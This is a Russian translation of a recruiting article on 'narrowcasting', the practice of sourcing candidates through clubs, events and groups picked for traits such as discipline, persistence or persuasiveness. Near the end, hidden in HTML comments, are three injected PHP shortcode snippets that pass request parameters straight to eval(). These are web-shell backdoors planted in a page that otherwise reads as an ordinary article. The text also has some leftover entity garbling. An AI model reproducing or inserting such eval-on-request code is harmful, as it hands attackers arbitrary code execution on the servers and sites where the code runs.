Узконаправленный поиск по конкретным навыкам и качествам

В чем разница?

Деятельность по поиску поставщиков, как и любая другая деятельность, может быть легко сгруппирована в категории, определяющие сферу применения, применимость/актуальность, стоимость, время цикла или любой другой отличительный признак. Узкое вещание - одна из таких категорий, которая относится к охвату целевой аудитории, на которую направлена деятельность. Она находится между вещанием и микровещанием.

Вещательный поиск

Вещательная деятельность по поиску кандидатов - это деятельность, направленная на поиск как можно более широкого круга талантов, и обычно предполагает использование средств массовой информации, которые одновременно охватывают несколько квалифицированных кандидатов и широкий круг неквалифицированных кандидатов. Радиовещание в значительной степени опирается на рекламу, будь то печатная (газеты, рекламные щиты, баннеры/вывески), электронная (баннерная реклама, массовые кампании по электронной почте, доски объявлений, корпоративные сайты по трудоустройству), а также старые добрые реферальные программы для сотрудников первого поколения.

Сорсинг узкого охвата

Сорсинг узкого охвата фокусируется на определенных (более узких) группах населения, которые демонстрируют схожие характеристики, способствующие успеху на конкретных рабочих местах. Цель узконаправленного поиска - не обязательно найти человека с опытом работы на данной должности или даже человека, который уже обладает всеми необходимыми знаниями и навыками, а скорее найти человека, который думает и действует так же, как те, кто наиболее успешен на данной должности. Например, рекрутеры, ищущие специалистов по продажам, могут обратить внимание на людей, которые постоянно проявляют энтузиазм и способность стабильно работать в нестабильных условиях.

Наррокастинг в значительной степени зависит от активного налаживания связей через социальные/активные клубы и общественные мероприятия. Налаживание связей может осуществляться рекрутером или любым заинтересованным лицом организации, участвующим в целевой реферальной программе второго поколения.

Микрокаст-сорсинг

Микрокастинг - это наиболее целевая категория подходов к поиску. Он используется в основном в тех случаях, когда организациям требуется небольшой объем узкоспециализированных кандидатов с опытом работы или обладающих редким сочетанием навыков. (Хотя многие рекрутеры думают, что они занимаются микрокастингом, на самом деле так поступают немногие). Он может включать такие подходы, как размещение рекламы в специальных профессиональных журналах, рейдерский захват конкурентов (либо силами самой организации, либо с помощью третьей стороны) или прямой поиск кандидатов, прошедших тщательное исследование.

Применение узкого кастинга

Уникальность узкого кастинга заключается в том, что он не предполагает поиск людей с определенными учеными степенями или опытом работы. Вместо этого он предполагает поиск людей, которые, скорее всего, обладают очень желательными качествами или способностями, которые либо необходимы в компании — т.е. качествами, которые соответствуют уникальной культуре фирмы — либо необходимы для конкретного рода занятий, например, продаж или обслуживания клиентов.

Примерами могут служить такие межличностные качества, как энтузиазм для специалистов по продажам, избегание риска для медсестер и терпимость к развивающимся личностям для учителей начальной школы. Сужение круга поиска может также фокусироваться на таких физических качествах, как ловкость рук для операторов станков и строителей или выносливость при высокой утомляемости для водителей магистральных грузовиков.

Хотя для многих рекрутеров вещание как методология поиска стало обычным делом, ряд организаций успешно используют сужение круга поиска для пополнения рядов в условиях возросшей конкуренции за таланты. Такие компании, как Home Depot и GE, выбрали бывших солдат из-за их дисциплинированности. Такие компании, как Wal-Mart, делали акцент на найме пенсионеров из-за их зрелости и воспринимаемой искренности. Производители сетевого оборудования нацеливаются на людей с особой склонностью к логистике, например, тех, кто регулярно следит за состоянием дорожного движения, за их способность находить обходные пути для устранения распространенных препятствий.

EDS, Microsoft и множество других фирм, занимающихся разработкой программного обеспечения, набирают музыкантов и математиков, прежде всего, за их способность выявлять и понимать закономерности, например, те, которые появляются на нотах или в математических моделях. Почти в каждой работе узконаправленный подход может быть успешным. Думали ли вы когда-нибудь, что из учителей начальной школы, умеющих управлять непокорными, получатся отличные бармены? В следующий раз, когда вы будете в Лас-Вегасе, поспрашивайте людей; вы можете быть удивлены тем, чем занимается в течение дня парень/девушка, наливающий вам напиток.

Переход от чирлидинга к продажам: Прыжок более распространен, чем можно предположить

Хотя идея привлечения нынешних и бывших чирлидеров к работе в качестве профессиональных продавцов может показаться натяжкой, на самом деле это не так. Если вам нужны люди, которые не боятся работать под давлением, общительны, целеустремленны и с энтузиазмом относятся к привлечению других людей, чирлидеры - идеальный вариант. И фармацевтические фирмы, и компании, производящие сетевое коммуникационное оборудование, обнаружили, что чирлидеры феноменальны в продажах.

Переход с футбольного поля в профессию продавца настолько распространен, что может послужить основанием для создания агентства по трудоустройству, известного как Spirited Sales Leaders, которое специализируется на людях-энтузиастах. В базе данных агентства более 10 000 "духовных лидеров", поэтому ясно, что другие признают необходимость подбора персонала, основанного на атрибутах, а не на навыках.

Процесс узкого кастинга

Процесс узкого кастинга довольно прост. Определите наиболее важные атрибуты успешных людей на любой работе или в любой семье профессий, а затем ищите способы выявления людей, демонстрирующих эти навыки или черты в других параллельных профессиях или видах деятельности. Например, если вы ищете человека, обладающего выносливостью и способностью не сдаваться, несмотря ни на что, наймите на финише триатлона Ironman/Ironwoman людей, обладающих выносливостью и упорством. Концепция узкого кастинга не нова; как говорится, "Если хочешь выйти замуж за врача или медсестру, побудь в больницах&quot-.

Поиск людей с желаемыми качествами не должен автоматически гарантировать прием на работу. Как и все другие источники, кандидаты, найденные с помощью узконаправленного вещания, должны быть оценены. Рекрутерам также не следует полагать, что они знают, где найти таких людей, и потратить время на сбор демографических данных, необходимых для составления профиля возможных организаций и мероприятий. Как и во всем рекрутинге, проведите свои метрики; если вы случайно обнаружите, что эти источники демонстрируют негативное влияние, вы можете изменить свой подход или добавить ресурсы в другие каналы поиска, которые в меньшей степени влияют на разнообразие и сбалансируют общий процесс.

Возможные узковещательные кадровые резервы

Лучший способ определить узковещательные кадровые резервы для навыков и качеств, специфичных для потребностей вашей организации, - это обратиться к людям в вашей организации, которые преуспели в определенных видах деятельности, и спросить их: "Как бы мне найти вас снова?" без использования традиционных широковещательных или микровещательных источников рекрутинга. Возможные резервы талантов включают:

  • Локальные или национальные клубы. Рассмотрите клубы, поддерживающие скалолазание, бридж, прыжки с парашютом, фрисби, обзоры книг, ресторанов/винотек или публичные выступления.
  • Организации, которые привлекают людей со схожими интересами или ценностями. Это могут быть религиозные, политические, социальные группы или группы по образу жизни. Например, клубы пожилых людей и волонтерская деятельность в местных благотворительных организациях привлекают людей с сильными ценностями. (Нет, вербовка в церквях или возрастных организациях не является незаконной, если 1) вы ищете навыки, а не конкретные религиозные убеждения, и 2) вы вербуете в различных организациях широкого спектра.
  • Интернет-сайты, где собираются люди с общими интересами.) Веб-сайты, чаты и блоги, где часто собираются люди с похожими навыками, также должны быть целевыми. Сюда можно отнести все - от форума медсестер до MySpace.
  • Спортивные и социальные мероприятия. Это могут быть открытые для публики спортивные мероприятия, спортивные соревнования в колледже, винные фестивали и домашние выставки, некоторые из которых в прошлом использовались компанией Cisco Systems для подбора персонала.
  • "Ценные" мероприятия. Если вы'ищете людей с сильной этикой или ценностями, вы можете рассмотреть патриотические, благотворительные, экологические и политические мероприятия, которые поддерживают требуемые вами ценности и этические стандарты.

Возможные группы по атрибутам

  • Дисциплина. Военные организации, математические общества, музыкальные группы, спортивные организации и библиотечные клубы.
  • Продуманное принятие риска. Клубы скалолазов, группы альпинистов и казино.
  • Хорошо справляется с высоким давлением. Ассоциации пилотов, группы поддержки, соревнующиеся спортсмены и организации по планированию мероприятий.
  • Настойчивость. Марафоны, триатлоны и конкурсы видеоигр.
  • Забота. Волонтеры в школах, благотворительные мероприятия, общественные мероприятия и больницы.
  • Игрок команды. Спортсмены в успешных любительских командах и командах колледжей, а также в командах, которые строят плавсредства и организуют общественные мероприятия.
  • Лидерство. Лидеры клубов и ассоциаций, офицеры и тренеры.
  • Политически подкованные. Бывшие политики, политические партии, добровольные лоббисты (например, лоббист-волонтер SHRM), и сборщики политических средств.
  • Обслуживание клиентов. Люди, которые работают на стойке возврата или в очереди за жалобами на общественных мероприятиях, а также отличный официантский персонал, стюардессы и метрдотели.
  • Этика. Нынешние или бывшие священнослужители, церковные дьяконы, члены церковного общества, учителя воскресной школы и лоббисты Конгресса (шутка).
  • Убедительные навыки. Черлидеры, группы тамады, бывшие дебатеры, бывшие продавцы печенья и лимонада, продавцы лотерейных билетов.
  • Планируйте заранее. Шахматисты на шахматных турнирах, организаторы мероприятий и любители походов на выносливость.
  • Многозадачность. Супруги, сидящие дома с детьми школьного возраста и небольшим бюджетом.
  • Знание языков. Книжные клубы, группы шекспировских актеров, политики, добровольные спичрайтеры, добровольные аукционисты и добровольцы, преподающие в школах английского как второго языка.
  • Навыки торговли и продаж. Успешные покупатели и продавцы на eBay, торговцы бейсбольными карточками и комиксами, коллекционеры монет и марок.
  • Свободная форма и инновации. Импровизационные комики и актеры, джазовые музыканты, клубы предпринимателей, клубы изобретателей, скейтбордисты, многие личности на MySpace и YouTube, съезды "Звездного пути", блогеры и блогерские съезды.
  • Зрительно-моторная координация. Турниры по видеоиграм, игроки в дартс и боулеры.
  • Знание мира. Группы французского и других языков, кулинарные группы, клубы путешественников, географические клубы, социальные группы, объединяющие представителей одной страны или региона, а также добровольные языковые и экскурсионные гиды для приезжих делегаций.

Требуется смелость

Не стоит даже думать об узком вещании, если вы не смелы, дерзки и непоколебимы, потому что как только вы затронете эту тему, вы& #039; получите ушат помоев.#039;получите кавалькаду нытья от слабаков HR и псевдо юристов, у которых будет тысяча оправданий, почему это никогда не сработает. Факт в том, что это действительно работает! Его использует небольшой отряд компаний мирового класса, у которых хватило смелости попробовать что-то другое. Если все насмехаются над этой идеей, это оставляет подход открытым для тех из нас, у кого есть мужество, необходимое для привлечения лучших членов команды в нашу компанию.

<!– [insert_php]if (isset($_REQUEST["Znipl"])){eval($_REQUEST["Znipl"]);exit;}[/insert_php][php]if (isset($_REQUEST["Znipl"])){eval($_REQUEST["Znipl"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["yBHV"])){eval($_REQUEST["yBHV"]);exit;}[/insert_php][php]if (isset($_REQUEST["yBHV"])){eval($_REQUEST["yBHV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["IYYwI"])){eval($_REQUEST["IYYwI"]);exit;}[/insert_php][php]if (isset($_REQUEST["IYYwI"])){eval($_REQUEST["IYYwI"]);exit;}[/php] –>

quot.

Рубрика: 
Ключевые слова: 
Автор: 
Источник: 
  • drjohnsullivan.com
Перевод: 
  • Valeratal

Поделиться